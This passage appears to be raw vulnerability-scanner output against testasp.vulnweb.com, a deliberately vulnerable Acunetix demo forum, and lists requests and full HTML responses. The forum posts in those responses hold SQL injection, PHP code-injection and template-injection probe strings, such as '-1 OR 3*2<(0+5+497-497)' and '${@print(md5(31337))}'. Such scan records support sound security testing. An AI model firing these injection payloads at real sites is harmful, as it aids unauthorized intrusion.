</tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3079 |
Response Body - size: 3,079 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3124 |
Response Body - size: 3,124 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx[[${98991*97996}]]xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx[[${98991*97996}]]xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx[[${98991*97996}]]xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3121 |
Response Body - size: 3,121 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3080 |
Response Body - size: 3,080 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}\</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3127 |
Response Body - size: 3,127 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx__${98991*97996}__::.x </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx__${98991*97996}__::.x </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx__${98991*97996}__::.x - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3121 |
Response Body - size: 3,121 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 3137 |
Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+627-627-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+627-627-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+627-627-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3079 |
Response Body - size: 3,079 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'.print(md5(31337)).'</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> 